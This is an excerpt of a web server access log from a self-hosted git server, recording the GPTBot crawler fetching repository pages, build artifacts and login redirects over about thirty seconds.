"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?files=.gitignore" [Client 74.7.227.38] [Length 17111] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/.gitignore" -[17/Feb/2026:16:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:16:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" -[17/Feb/2026:16:00:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12054] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10094] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 1468] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache?display=rendered" [Client 74.7.227.38] [Length 10940] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:16:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13545] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" -[17/Feb/2026:16:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11618] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71173] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 71877] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 37023] [Gzip 14.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13510] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" -[17/Feb/2026:16:00:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:16:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38589] [Gzip 14.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" -[17/Feb/2026:16:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 71906] [Gzip 17.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10215] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99662] [Gzip 29.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:16:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 99883] [Gzip 29.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47654] [Gzip 26.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" -[17/Feb/2026:16:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9881] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10426] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 99908] [Gzip 29.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:00:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 49735] [Gzip 27.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:16:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11043] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17035] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:00:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12992] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11008] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11590] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp" -[17/Feb/2026:16:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11895] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" -[17/Feb/2026:16:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr 